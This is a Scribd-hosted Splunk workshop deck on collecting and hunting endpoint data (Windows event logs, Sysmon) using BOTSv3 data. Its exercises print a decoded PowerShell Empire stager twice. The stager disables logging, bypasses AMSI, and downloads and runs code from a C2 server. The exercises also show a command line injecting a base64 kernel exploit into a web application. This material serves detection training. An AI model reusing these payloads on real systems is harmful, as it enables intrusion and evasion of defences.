Scribd
Upload
321 views

Splunking The Endpoint

This document provides information about collecting endpoint data using the Splunk Universal Forwarder. It discusses how the Universal Forwarder can be used to collect a wide range of endpoint data, including logs, processes, registry information, and more. It highlights how endpoint data is critical for security operations and investigations, as it can provide insights into tactics and techniques used by attackers. The document also contains resources for configuring the Universal Forwarder to collect specific Microsoft Windows event logs and system information.

Uploaded by

ronaldo.panuelos
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
321 views

Splunking The Endpoint

This document provides information about collecting endpoint data using the Splunk Universal Forwarder. It discusses how the Universal Forwarder can be used to collect a wide range of endpoint data, including logs, processes, registry information, and more. It highlights how endpoint data is critical for security operations and investigations, as it can provide insights into tactics and techniques used by attackers. The document also contains resources for configuring the Universal Forwarder to collect specific Microsoft Windows event logs and system information.

Uploaded by

ronaldo.panuelos
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
You are on page 1/ 278

© 2021 SPLUNK INC.

Wifi & Server Information

Network: <Insert Wifi Network Here>

Password: <Insert Password Here>


© 2021 SPLUNK INC.

Splunking the
Endpoint for Security
Based on BOTS Data

December 2020 | Version 1.1


© 2021 SPLUNK INC.

The Importance of Endpoint Data

Filtering? Really?

The Universal Forwarder

What Can I Find With Endpoint Logging?

Endpoint Content Sources


© 2021 SPLUNK INC.

Security Operations Suite Architecture

Our Focus
Today

Our Focus Today!


© 2021 SPLUNK INC.

Background for this Workshop


Much of this content is based on the following .conf Sessions by James Brodsky

.conf19 - Splunking the Endpoint V: Hands On with BOTSv4 Data


• https://conf.splunk.com/files/2019/slides/SEC2007.pdf
• https://conf.splunk.com/files/2019/recordings/SEC2007.mp4

.conf18 - Splunking the Endpoint IV: A New Hope


• https://static.rainfocus.com/splunk/splunkconf18/static/staticFile/static_file/SEC1378_SECURITY-
BRODSKY_SPLUNKINGTHEENDPOINTIV_FINAL_REDACT.pdf
• https://conf.splunk.com/files/2018/recordings/splunking-the-endpoint-iv-sec1378.mp4
© 2021 SPLUNK INC.

Devices

What’s an
Endpoint?
(courtesy McAfee)

What’s an endpoint? Printers


© 2021 SPLUNK INC.

The Endpoint Is Important!

Closest to
Versatile
humans

Under protected Data-rich


© 2021 SPLUNK INC.

And often the weak link

Closest to
humans

Under protected
82%
of successful breaches
Versatile

Data-rich

involved an endpoint*
*SANS 2018 Endpoint Security Survey
© 2021 SPLUNK INC.

Host/Endpoint: Artifacts and Patterns

Users Hardware

Processes Memory

Services Disk activity

Drivers File monitoring: hash values, integrity


checking and alerts, creation or deletion
Files
Wire Data
Registry
© 2021 SPLUNK INC.
© 2021 SPLUNK INC.
© 2021 SPLUNK INC.
© 2021 SPLUNK INC.
© 2021 SPLUNK INC.

• Windows Event Logs: 46% (#1 source by volume)


• UNIX TA: 16%
• Windows Perfmon: 6%
• Windows Registry: 6%
• McAfee EPO: 6%
• Symantec Endpoint: 4%
• Non-Microsoft DNS: 4%
• Carbon Black: 2%
• Crowdstrike: 2%
• Microsoft Sysmon: 1%
(Q1 2019 internal data)
© 2021 SPLUNK INC.

Cisco CSIRT…

(Valites/Bollinger, 2019)
© 2021 SPLUNK INC.

Endpoint Info Critical to CIS CSC20 (SANS20)


1 & 2: Log hardware info, running processes/services

3: Scripted inputs to check for config issues


1 Inventory of Authorized 7 Email & Web Browser
& Unauthorized Devices Protections
4: Evaluate processes/services for vulns
2 Inventory of Authorized 8 Malware Defenses
& Unauthorized
5: Look for local use of privileged accounts Software
3 Secure Configurations 9 Limitation & Control of
6: Gather Windows events/*nix logs for Hardware and Network Ports,
Software on Mobile Protocols and Services
Devices, Laptops,
7: Find unauthorized web browsers or mail clients Workstations, and
Servers
8: Look for malicious services/processes 4 Continuous 13 Data Protection
Vulnerability
Assessment &
9: Look for malicious ports/protocols Remediation
5 Controlled Use of 14 Controlled Access
13: Identify lapses in local encryption Administrative Based on the Need to
Privileges Know
14: Identify improper account usage or file access 6 Maintenance, 16 Account Monitoring &
Monitoring & Analysis Control
of Audit Logs
16: Monitor use of privileged and service accounts

You could do all of that with the Universal Forwarder.


© 2021 SPLUNK INC.

Endpoint Info Critical to Many Detections


© 2021 SPLUNK INC.

MITRE ATT&CK
https://attack.mitre.org/

“knowledge base of adversary tactics and techniques based on real-world observations”


• Originally used by Threat Intelligence analysts to better articulate techniques and tactics used by Nation-State
adversaries
• Adopted by the SecOps to describe attacks
• Endpoint vendors are now using it to evaluate their coverage
– https://attackevals.mitre.org/

Endpoint data provides insight into adversary tactics and techniques due to the fidelity of
the logging

Understanding Execution, Persistence, Privilege Escalation, Credential Access tactics as


well as a subset of Initial Access, Defense Evasion, Discovery, Lateral Movement,
Collection and even Exfiltration tactics will be dependent upon analysis of the endpoint
events
© 2021 SPLUNK INC.

MITRE ATT&CK in Security Essentials


© 2021 SPLUNK INC.

Additional Ways to Gather Endpoint Data

Web Proxy

NG Endpoint Integrity
Protection Management


Whitelisting
© 2021 SPLUNK INC.

The Universal
Forwarder
It’s More Than You Think
© 2021 SPLUNK INC.

The Splunk Universal Forwarder


“Free”

Lightweight

Secure

Runs on many versions of Windows,


*nix, and macOS/OSX

Flexible

Centrally configurable

Scalable
© 2021 SPLUNK INC.

The UF: It’s More Than You Think

Process/Apps/FIM Perfmon

Registry Wire Data

Scripts Logs Sysmon

*Including PowerShell!
© 2021 SPLUNK INC.

The Universal Forwarder: Pros and Cons


• No per-node license • It’s an agent
• Fully supported by Splunk • You must install and maintain it
• Lots of success and community • It doesn’t run on all OS’s you
help may have
• Efficient and secure transfer of • It only sends to Splunk*
data • Improperly configured it can
• Efficient distribution of data (if impact performance
architected properly) • It can be used for good…or
• Less complexity evil…
• Lots of capability besides “just
logs”
© 2021 SPLUNK INC.

Setting the
Scene
© 2021 SPLUNK INC.
© 2021 SPLUNK INC.
© 2021 SPLUNK INC.
© 2021 SPLUNK INC.

$whoareyou

Alice Bluebird
Security Analyst, Frothly
© 2021 SPLUNK INC.

User Access Information

Instances – Splunk
• <insert your instances>
• https://ws-ep-1-xxx.ws.o2.splunkit.io
• https://ws-ep-2-xxx.ws.o2.splunkit.io
• https://ws-ep-3-xxx.ws.o2.splunkit.io

Usernames should have been distributed


© 2021 SPLUNK INC.

Collecting
What You
Need
Microsoft Specific
© 2021 SPLUNK INC.

(Justin Henderson, SANS 555 Course Author)


© 2021 SPLUNK INC.

Resources - What Can Be Filtered


© 2021 SPLUNK INC.

Hands-On:
Windows Event Code
Guidance
© 2021 SPLUNK INC.
© 2021 SPLUNK INC.

Click
© 2021 SPLUNK INC.

Select “Michael Gough” and “NSA”


© 2021 SPLUNK INC.
© 2021 SPLUNK INC.
© 2021 SPLUNK INC.
© 2021 SPLUNK INC.
© 2021 SPLUNK INC.

Click on 4688
© 2021 SPLUNK INC.

4 Click

Click 2
Set the data range to be “Between”
8/1/2019 and 8/3/2019

Click
© 2021 SPLUNK INC.
© 2021 SPLUNK INC.

Click “Table Analysis” and


select “Recommended Events Table”
© 2021 SPLUNK INC.

2 Select “ALL”

1 4
Set Date Range: Click
Select “main”
Between August 1-3, 2019 3
Which events are we collecting that we
© 2021 SPLUNK INC.

“should” be, and from how many hosts?


© 2021 SPLUNK INC.

Which events are we collecting


that perhaps we should NOT
(for security use cases), and
from how many hosts?
© 2021 SPLUNK INC.

Click “Individual Analyzers” and


select “Individual Host Analysis”
© 2021 SPLUNK INC.

Set the data range to be “Between” Enter the host “BTUN-L” 3 Click
2
1 8/1/2019 and 8/3/2019
© 2021 SPLUNK INC.

Onboard logs from your “golden image” and analyze!


© 2021 SPLUNK INC.
© 2021 SPLUNK INC.

Challenge Questions
1. Based on the advice of the JP-CERT and Huntersforge, how many event codes do
these two sources jointly recommend? If we review the recommended Event Codes,
there is a difference of opinion between these entities. Review the top 10 most
recommended event codes and provide the event codes that differed between the two
organizations.

2. What Windows Event System event codes have been seen on at least 10 hosts but
are probably not needed based on data collected between August 1 and 3 for from the
main index?

3. The Treemap Analysis section of the navigation bar performs the same analysis as
the Table Analysis section but displays data in a graphical format. Generate a treemap
based on data collected between August 1-3, 2020 that has at least 4 recommenders
from all sources and the main index.
© 2021 SPLUNK INC.

Question #1
Lookup Overview

1. Based on the advice of the JP-CERT and Huntersforge, how many event codes do
these two sources jointly recommend? If we review the recommended Event Codes,
there is a difference of opinion between these entities. Review the top 10 most
recommended event codes and provide the event codes that differed between the two
organizations.
© 2021 SPLUNK INC.
© 2021 SPLUNK INC.
© 2021 SPLUNK INC.

Question #2
Other Events Table

What Windows Event System event codes have been seen on at least 10 hosts but are
probably not needed based on data collected between August 1 and 3 for from the main
index?
© 2021 SPLUNK INC.
© 2021 SPLUNK INC.

Question #3
Recommended Events Treemap

The Treemap Analysis section of the navigation bar performs the same analysis as the
Table Analysis section but displays data in a graphical format.

Generate a treemap based on data collected between August 1-3, 2020 that has at least
4 recommenders from all sources and the main index.
© 2021 SPLUNK INC.
© 2021 SPLUNK INC.

What to collect from user endpoints?

▶ Basic ▶ Intermediate ▶ Advanced/Specific


• Windows Event logs • Sysmon (with TaySwift or • Splunk Stream
• Security Olaf config + Splunk • Perfmon
Tweaks)
− Set up command process • PowerShell Transcription
auditing (4688) • Captures registry Logs
• System instead of Splunk
regmon • AppLocker
• Application • Windows Firewall
• PowerShell
• WindowsUpdateLog (on • WinPrintMon
supported systems) • Module Logging
• Script Block Logging • Native USB Auditing
• Scripted Inputs
But… you probably can’t collect EVERYTHING on every endpoint…
© 2021 SPLUNK INC.

Storage and compute


doesn’t grow on trees
© 2021 SPLUNK INC.

Case Study #1
BOTS Endpoint Configuration
Latest (at the time) UF (7.3.x) on every endpoint

Latest Windows TA with all standard scripted inputs enabled except none of the “Mon” inputs (regmon,
netmon, printmon, etc)

Windows Security, System, Application Events using Michael Gough’s audit config and some filtering on
Security events

Microsoft Sysmon v10 with Olaf Hartong’s latest config + some more Splunk filtering tweaks

Windows PowerShell/Operational log (4103 and 4104 events)

CB Response with watchlists and five standard threat feeds, as well as netconn and process events

Splunk Stream collecting DNS, HTTP, TCP, UDP, DHCP and a few other protocols

To gauge ingest levels we look at only Windows Events, Sysmon, Scripted TA output, and PowerShell
© 2021 SPLUNK INC.

What ingest did we see?

Upwards of 50MB per endpoint? Uhoh.


© 2021 SPLUNK INC.

4688=Critical, but can also use


Sysmon Event Code 1 instead
4673=Not recommended to collect 4689=Not recommended to collect

4663=Granular object auditing

In general, we had lots of extra stuff


© 2021 SPLUNK INC.

If we remove those four codes…

Best case, ~6MB a day, worst, ~12MB!


© 2021 SPLUNK INC.

Case Study #1: Lessons Learned


BOTS Endpoint Config

If you can at all use Sysmon, do it!


• Much more granular and flexible filtering for process events, file creates
• 4688 is better than nothing

Be ruthless about what event codes you collect


• Collect the ones that meet your use case and are “recommended”

renderXML=true may save you some space


• We used Classic because of some issues we found with filtering. As of May 2020, with the latest Windows
TA, renderXML=true is default, and can be left in most cases…we will go into details a bit later.
© 2021 SPLUNK INC.

Case Study #2
Large, Fortune 500 company based in the US

70,000 Windows endpoints running Carbon Black Response

cb-event-forwarder to get raw sensor data in Splunk

COLLECT: Process info, network connection info, alerts, watchlists

NOT COLLECT: File modifications, registry modifications, and module loads: diminishing
returns from both Splunk license and storage perspective…
• (and if you need to, you can always hunt this stuff in the native tool.)

600GB a day (about 8.5MB per endpoint, per day!)


© 2021 SPLUNK INC.

Case Study #3
A Great Example of Filtering!

1700 endpoints

Windows Event logs, Sysmon,


some Perfmon, PowerShell

Approx. 10 MB per Windows


endpoint!
© 2021 SPLUNK INC.

What Does Endpoint Collection Nirvana Look


Like?

~1MB per hour a “nirvana” goal.

But realistically, max 2MB per


work-hour
© 2021 SPLUNK INC.

Resource for Examples on Filtering Windows


Event Codes…

Version 8.0 of the Windows TA (Splunkbase)

Automine’s (David Shpritz)’s Github and related presentation:


• https://www.aplura.com/assets/pdf/SplunkWindowsEventLogs.pdf
• https://gist.github.com/automine/a3915d5238e2967c8d44b0ebcfb66147

What we used for BOTS


• https://splk.it/conf19-splunk-endpoint
© 2021 SPLUNK INC.

Windows
Event Logs
© 2021 SPLUNK INC.

4688
WinEventLog:Security

Please. With command-line auditing.

https://docs.microsoft.com/en-us/windows-server/identity/ad-
ds/manage/component-updates/command-line-process-auditing
© 2021 SPLUNK INC.
© 2021 SPLUNK INC.

Warm-Up Question

What types of Windows Event logs do we have on our systems?


• Security?
• Application?
• System?
• Other?

How many events do we have for each type?

Hints
• index - botsv3
• sourcetype - wineventlog
© 2021 SPLUNK INC.
© 2021 SPLUNK INC.

Warm-Up Question

What types of Windows Event logs do we have on our systems?


• Security? 46,469
• Application? 719
• System? 482
• Other?
– PowerShell 92

How many events do we have for each type?


© 2021 SPLUNK INC.

Question #1
Events from Other Applications

Different applications can log to Windows Events. Symantec Anti-virus is doing that in our
Splunk instance. Based on that, are any Frothly systems recording security events based
on Symantec Anti-virus? If they are, what signatures are being recorded and on what
systems?

Hints
• Drill into the Windows Application events from our previous search
• Check out the field SourceName to find applications that integrate with the Windows Event logging service
• The Windows Event message field has loads of information in it
© 2021 SPLUNK INC.
© 2021 SPLUNK INC.
© 2021 SPLUNK INC.

| stats Command
https://docs.splunk.com/Documentation/Splunk/latest/SearchReference/Stats

Values (values)

Group By (by)

| stats values(Message) by host


© 2021 SPLUNK INC.
© 2021 SPLUNK INC.

Question #1
Events from Other Applications

Different applications can log to Windows Events. Symantec Anti-virus is doing that in our
Splunk instance. Based on that, are any Frothly systems recording security events based
on Symantec Anti-virus? If they are, what signatures are being recorded and on what
systems?

Five hosts - BGIST-L, BTUN-L, JWORTOS-L, MKRAEUS-L, PCERF-L

Signatures - Backdoor.PsEmpire, W97M.Empstage


© 2021 SPLUNK INC.

Question #2
Process Execution in Windows

One of the users whose anti-virus did not alert for Backdoor.PsEmpire was the
administrator, Bud Stoll. Can we find evidence of PowerShell Empire activity on his
system and any network artifacts associated with it?

Hints
• Source - WinEventLog:Security
• The event code for Process Execution is 4688
• Bud’s host is BSTOLL-L
• Look for PowerShell but you may need to decode it
© 2021 SPLUNK INC.
© 2021 SPLUNK INC.

NOTE: You may need to copy the base64 out of the raw event to get all of the characters!
© 2021 SPLUNK INC.

https://gchq.github.io/CyberChef/
© 2021 SPLUNK INC.

CyberChef: Make it prettier!


© 2021 SPLUNK INC.

CyberChef: One last thing!


© 2021 SPLUNK INC.

if($psversiontable.psversion.major -ge
3){$gpf=[ref].assembly.gettype('system.management.automation.utils')."getfie`ld"('cachedgrouppolicysettings','n'+'on
public,static');if($gpf){$gpc=$gpf.getvalue($null);if($gpc['scriptb'+'locklogging']){$gpc['scriptb'+'locklogging']['enablesc
riptb'+'locklogging']=0;$gpc['scriptb'+'locklogging']['enablescriptblockinvocationlogging']=0}$val=[collections.generic.d
ictionary[string,system.object]]::new();$val.add('enablescriptb'+'locklogging',0);$val.add('enablescriptblockinvocationl
ogging',0);$gpc['hkey_local_machine\software\policies\microsoft\windows\powershell\scriptb'+'locklogging']=$val}els
e{[scriptblock]."getfie`ld"('signatures','n'+'onpublic,static').setvalue($null,(new-object
collections.generic.hashset[string]))}$ref=[ref].assembly.gettype('system.management.automation.amsiutils');$ref.get
field('amsiinitfailed','nonpublic,static').setvalue($null,$true);};[system.net.servicepointmanager]::expect100continue=
0;$wc=new-object system.net.webclient;$u='mozilla/5.0 (windows nt 6.1; wow64; trident/7.0; rv:11.0) like
gecko';[system.net.servicepointmanager]::servercertificatevalidationcallback = {$true};$wc.headers.add('user-
agent',$u);$wc.headers.add('user-
agent',$u);$wc.proxy=[system.net.webrequest]::defaultwebproxy;$wc.proxy.credentials =
[system.net.credentialcache]::defaultnetworkcredentials;$script:proxy =
$wc.proxy;$k=[system.text.encoding]::ascii.getbytes('1ab<yk6z4#+vvu%o5}8&m-
9ul~l|>0gp');$r={$d,$k=$args;$s=0..255;0..255|%{$j=($j+$s[$_]+$k[$_%$k.count])%256;$s[$_],$s[$j]=$s[$j],$s[$_]};
$d|%{$i=($i+1)%256;$h=($h+$s[$i])%256;$s[$i],$s[$h]=$s[$h],$s[$i];$_-
bxor$s[($s[$i]+$s[$h])%256]}};$ser=$([text.encoding]::unicode.getstring([convert]::frombase64string('aab0ahqacabz
adoalwavadqanqauadcanwauaduamwauadeanwa2adoanaa0adma')));$t='/admin/get.php';$wc.headers.add("cookie"
,"pthavgs=bkqxpuod5lpcjyfrc1bxpqq8fwi=");$data=$wc.downloaddata($ser+$t);$iv=$data[0..3];$data=$data[4..$data
.length];-join[char[]](& $r $data ($iv+$k))|iex
© 2021 SPLUNK INC.

if($psversiontable.psversion.major -ge
3){$gpf=[ref].assembly.gettype('system.management.automation.utils')."getfie`ld"('cachedgrouppolicysettings','n'+'on
public,static');if($gpf){$gpc=$gpf.getvalue($null);if($gpc['scriptb'+'locklogging']){$gpc['scriptb'+'locklogging']['enablesc
riptb'+'locklogging']=0;$gpc['scriptb'+'locklogging']['enablescriptblockinvocationlogging']=0}$val=[collections.generic.d
ictionary[string,system.object]]::new();$val.add('enablescriptb'+'locklogging',0);$val.add('enablescriptblockinvocationl
ogging',0);$gpc['hkey_local_machine\software\policies\microsoft\windows\powershell\scriptb'+'locklogging']=
$val}else{[scriptblock]."getfie`ld"('signatures','n'+'onpublic,static').setvalue($null,(new-object
collections.generic.hashset[string]))}$ref=[ref].assembly.gettype('system.management.automation.amsiutils');$ref.get
field('amsiinitfailed','nonpublic,static').setvalue($null,$true);};[system.net.servicepointmanager]::expect100continue=
0;$wc=new-object system.net.webclient;$u='mozilla/5.0 (windows nt 6.1; wow64; trident/7.0; rv:11.0) like
gecko';[system.net.servicepointmanager]::servercertificatevalidationcallback = {$true};$wc.headers.add('user-
agent',$u);$wc.headers.add('user-
agent',$u);$wc.proxy=[system.net.webrequest]::defaultwebproxy;$wc.proxy.credentials =
[system.net.credentialcache]::defaultnetworkcredentials;$script:proxy =
$wc.proxy;$k=[system.text.encoding]::ascii.getbytes('1ab<yk6z4#+vvu%o5}8&m-
9ul~l|>0gp');$r={$d,$k=$args;$s=0..255;0..255|%{$j=($j+$s[$_]+$k[$_%$k.count])%256;$s[$_],$s[$j]=$s[$j],$s[$_]};
$d|%{$i=($i+1)%256;$h=($h+$s[$i])%256;$s[$i],$s[$h]=$s[$h],$s[$i];$_-
bxor$s[($s[$i]+$s[$h])%256]}};$ser=$([text.encoding]::unicode.getstring([convert]::frombase64string('aab0ahqacabz
adoalwavadqanqauadcanwauaduamwauadeanwa2adoanaa0adma')));$t='/admin/get.php';$wc.headers.add("co
okie","pthavgs=bkqxpuod5lpcjyfrc1bxpqq8fwi=");$data=$wc.downloaddata($ser+$t);$iv=$data[0..3];$data=$data[4..
$data.length];-join[char[]](& $r $data ($iv+$k))|iex
© 2021 SPLUNK INC.
© 2021 SPLUNK INC.
© 2021 SPLUNK INC.
© 2021 SPLUNK INC.
© 2021 SPLUNK INC.

Question #2
Process Execution in Windows

One of the users whose anti-virus did not alert for Backdoor.PsEmpire was the
administrator, Bud Stoll. Can we find evidence of PowerShell Empire activity on his
system and any network artifacts associated with it?

Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko

/admin/get.php

Decoded a substring to find: https://45.77.53.176:443


© 2021 SPLUNK INC.

Can We Do This Just Using Splunk?


Yes…But You Must Use regex!
index=botsv3 source="wineventlog:security" host=BSTOLL-L EventCode=4688 powershell
| rex field=Process_Command_Line "-((?i)enc|encodedcommand|encode|en)\s\'?(?<base64_command>.*\=?\=?)"
| decrypt field=base64_command atob() emit('b64decrypted') Decrypt base64
| rex mode=sed field=b64decrypted "s/\.//g"
| rex field=b64decrypted "(?i)FROMBASE64STRING\(\'(?<nestedb64destination>\w+)\'\)"
| decrypt field=nestedb64destination atob() emit('b64destinationdecrypted')
| rex mode=sed field=b64destinationdecrypted "s/\.\.\./period/g" Remove padding artifacts
| rex mode=sed field=b64destinationdecrypted "s/\.//g"
| rex mode=sed field=b64destinationdecrypted "s/period/./g" Remove padding from IP address
| eval b64decrypted=lower(b64decrypted)
| search b64decrypted="*downloaddata($ser+$t)*" Find our indicator
| table _time,src_user,host,b64destinationdecrypted
© 2021 SPLUNK INC.

Microsoft
Sysmon
Primer
© 2021 SPLUNK INC.

Microsoft Sysmon
Primer

A few blog posts to get you started


• https://www.splunk.com/en_us/blog/tips-and-tricks/monitoring-network-traffic-with-sysmon-and-splunk.html
• https://www.splunk.com/en_us/blog/security/a-salacious-soliloquy-on-sysmon.html

Great Sysmon configurations


• https://github.com/SwiftOnSecurity/sysmon-config
• https://github.com/olafhartong/sysmon-modular

Apps & TAs available on Splunkbase


• Sysmon App for Splunk https://splunkbase.splunk.com/app/3544/

Increases the fidelity of Microsoft logging, version 11 as of May 2020


© 2021 SPLUNK INC.

Microsoft Sysmon
It Keeps Getting Better and Better!

https://docs.microsoft.com/en-us/sysinternals/downloads/sysmon
© 2021 SPLUNK INC.

If you take nothing else from this workshop....

EventCode 1 from Sysmon


© 2021 SPLUNK INC.

What’s in Sysmon? (1/4)


Some of the highlights

Event Code 1: Process creation


• Everything that Windows Event 4688 provides and MORE!
• Log when a process is created – full command line and parent processes as well as hash

Event Codes 3: Network Connection


• Logs TCP/UDP connections on the machine
• Linked to a process through the ProcessId and ProcessGUID fields

Event Code 10: Process accessed


• One process accessing the memory of other processes
• Probably too noisy to use
© 2021 SPLUNK INC.

What’s in Sysmon? (2/4)


Some of the highlights

Event Code 11: File creation


• Poor man’s FIM
• Log when a file is created or overwritten – monitor creation of things in autorun locations or with usually
suspicious extensions (.bat, .vbs, .ps1, .docm, .xlsm)

Event Codes 12, 13, 14: Registry key creation, deletion, and modification
• More flexible/performant than registry monitoring built into UF
• More persistent delivery than UF due to event log mechanism

Event Code 15: Alternate Data Stream creation


• Tracks if/when files are created with ADS that have suspicious content (.bat, .vbs, .ps1, .cmd, etc.)
• Browser Drops (Mark Of The Web)
© 2021 SPLUNK INC.

What’s in Sysmon? (3/4)


Some of the highlights

Event Codes 17 and 18: Pipe creation and connection


• Sometimes malware uses named pipes for interprocess communication

Event Codes 19, 20, and 21: WMI


• WMI event filter, event consumer, and event consumer to filter activity

For a good example of fairly recent malware using BOTH of these


techniques, research “Nyetya” derivative of Petya/NotPetya/Goldeneye.
http://blog.talosintelligence.com/2017/06/worldwide-ransomware-variant.html
Splunk Add-On for Microsoft Sysmon
© 2021 SPLUNK INC.

What’s in Sysmon? (4/4)


Some of the highlights
Event ID 22: DNSEvent (DNS query)
• Created when a process executes a DNS query, whether the result is successful or fails, cached or not.

Event ID 23: FileDelete (A file delete was detected)


• Pretty self explanatory!

Splunk Add-On for Microsoft Sysmon


• Endpoint CIM compliant
• https://splunkbase.splunk.com/app/1914

Researchers publishing new rulesets for granular detections:


• UAC Bypass -
https://github.com/Neo23x0/sigma/blob/master/rules/windows/sysmon/sysmon_uac_bypass_eventvwr.yml
• Chinese/Vietnamese/Iranian keyboard layout connecting to server
© 2021 SPLUNK INC.

Classic or XML?
renderXML=true is the DEFAULT for Windows TA since 6.0

inputs.conf file, usually on a Universal Forwarder:

[WinEventLog://Security]
index=security
(Applies to both Sysmon and Windows TA…)
current_only=1
evt_resolve_ad_obj=0
renderXml=true
disabled=0
© 2021 SPLUNK INC.

Classic or XML?
Why should I consider using renderXML across all endpoints?

PROS to XML CONS to XML


• Usually smaller ingest size • Slower raw search (Classic
• More efficient indexing uses indexed extractions)
• Gets all the fields • Harder to read
• Preferred according to
Microsoft
• Required for WEC/WEF
collection to work
• Required for multi-language
environments to preserve field
names
© 2021 SPLUNK INC.

Classic or XML?
The language issue
© 2021 SPLUNK INC.

Classic or XML?
Keywords?
© 2021 SPLUNK INC.

Sysmon Example
Event Code 3 – Network Connect
© 2021 SPLUNK INC.

Another Sysmon Example


Event Code 1 – Process Creation
© 2021 SPLUNK INC.
© 2021 SPLUNK INC.

Sysmon Configuration

Sysmon can be configured to collect or not collect based upon an xml file that matches
against specific fields

Good resources to start to tune your Sysmon collection

Sysmon configuration file template with default high-quality event tracing


• https://github.com/SwiftOnSecurity/sysmon-config

A Sysmon configuration repository for everybody to customize


• https://github.com/olafhartong/sysmon-modular
© 2021 SPLUNK INC.

Example Exclusions for


EventCode 1

Example
Exclusions for
EventCode 2
© 2021 SPLUNK INC.

SwiftOnSecurity Config in Action

with network
events ???

without network
events
© 2021 SPLUNK INC.

Clever network
filtering (the config is
chock full of stuff like this)
© 2021 SPLUNK INC.

Sysmon Mapping
Supported in Sysmon v8 and above

Olaf Hartong’s Modular Sysmon


Config Repository
• Mapped of Sysmon-reported events to
MITRE ATT&CK!
© 2021 SPLUNK INC.

Hands-On:
Microsoft Sysmon
© 2021 SPLUNK INC.
© 2021 SPLUNK INC.

Question #1
Network Connect

FYODOR-L is observed running processes that based on their network connections might
be considered anomalous for a workstation. Which process(es) appear to be generating
odd network traffic?

Hints
• index – botsv3
• sourcetype - xmlwineventlog:microsoft-windows-sysmon/operational (Sysmon)
• EventCode – 3
• Check out the ports!
© 2021 SPLUNK INC.
© 2021 SPLUNK INC.

| stats Command
https://docs.splunk.com/Documentation/Splunk/latest/SearchReference/Stats

Distinct Count (dc)

Values (values)

Group By (by)

| stats dc(dest_port) as portcount values(dest_port) as ports by host Image user


© 2021 SPLUNK INC.
© 2021 SPLUNK INC.

Question #1
Network Connect

FYODOR-L is observed running processes that based on their network connections might
be considered anomalous for a workstation. Which process(es) appear to be generating
odd network traffic?

Yes, C:\Windows\Temp\hdoor.exe

Ports 135, 139, 21, 22, 3306, 443, 445, 80, 8000, 8080

Based on this, what might we hypothesize that this executable might do?
© 2021 SPLUNK INC.

Question #2
Process Creation

FYODOR-L ran “hdoor.exe” which is communicating on lots of ports. What is it?

What do we need to build this search?


• index – botsv3
• sourcetype - xmlwineventlog:microsoft-windows-sysmon/operational (Sysmon)
• EventCode – 1
• Host - FYODOR-L
• Hdoor.exe
• Pivot to VirusTotal to learn more!
© 2021 SPLUNK INC.
© 2021 SPLUNK INC.
© 2021 SPLUNK INC.
© 2021 SPLUNK INC.
© 2021 SPLUNK INC.

Question #2
Process Creation

FYODOR-L ran “hdoor.exe” which is communicating on lots of ports. What is it?

Appears to be a port scanner that was scanning a block of addresses at Frothly

Identified on VirusTotal with a different name but is thought to be malicious by 25 detection


engines
© 2021 SPLUNK INC.

Question #3
Try It Yourself!

It looks like FYODOR-L was used to perform some network discovery. What other
process was run on this host that may be masquerading as a legitimate process?

Hints
• index – botsv3
• sourcetype - xmlwineventlog:microsoft-windows-sysmon/operational (Sysmon)
• Event Code – 1
• Look for fields that might contain the process executed and group them to see which ones are most
frequently seen
© 2021 SPLUNK INC.
© 2021 SPLUNK INC.
© 2021 SPLUNK INC.

Question #3
Try It Yourself!

It looks like FYODOR-L was used to perform some network discovery. What other
process was run on this host that may be masquerading as a legitimate process?

iexeplorer.exe

Others?
© 2021 SPLUNK INC.

Question #4
Try It Yourself!

iexeplorer.exe appears to be suspicious based on the attributes we just talked about.


What commands have been issued that reference iexeplorer.exe process on this host?
What makes them peculiar?

Hints
• Start where you left off in the previous question
• Sysmon Process Execution events contains detail down to the command line
• The table command can help you view events in a tabular layout
© 2021 SPLUNK INC.

1
Click

Click
© 2021 SPLUNK INC.
© 2021 SPLUNK INC.
© 2021 SPLUNK INC.

Question #4
Try It Yourself!

iexeplorer.exe appears to be suspicious based on the attributes we just talked about.


What commands have been issued that reference iexeplorer.exe process on this host?
What makes them peculiar?

Some Linux Commands

Call out to the same internal server (192.168.9.30)

Would anyone want to share specific activities they found that are interesting?
© 2021 SPLUNK INC.

Question #5
Try It Yourself!

The system being referenced in the previous command listing has had something called
“colonel” compiled on it and executed. What is it?

Hints
• Build on our prior search
• Base64 can be decoded using tools like CyberChef (Copy/Paste) or in Splunk using an app like Decrypt (rex
command first)
© 2021 SPLUNK INC.
© 2021 SPLUNK INC.

"C:\windows\temp\unziped\lsof-master\iexeplorer.exe" http://192.168.9.30:8080/frothlyinventory/showcase.action "echo


LyoKICogVWJ1bnR1IDE2LjA0LjQga2VybmVsIHByaXYgZXNjCiAqCiAqIGFsbCBjcmVkaXRzIHRvIEBibGVpZGwKICogLSB2bmlrCiAqLwoKLy8gVGVzdGVkIG9uOgovLyA0LjQuMC0xMTYtZ2VuZXJpYyAjMTQwLVVidW50dSBTTVAgTW9uIEZlYiAxMiAyMToyMzowNCBVVEMgMjAxOCB4ODZfNjQKLy
8gaWYgZGlmZmVyZW50IGtlcm5lbCBhZGp1c3QgQ1JFRCBvZmZzZXQgKyBjaGVjayBrZXJuZWwgc3RhY2sgc2l6ZQojaW5jbHVkZSA8c3RkaW8uaD4KI2luY2x1ZGUgPHN0ZGxpYi5oPgojaW5jbHVkZSA8dW5pc3RkLmg+CiNpbmNsdWRlIDxlcnJuby5oPgojaW5jbHVkZSA8ZmNudGwuaD4KI2luY2x1
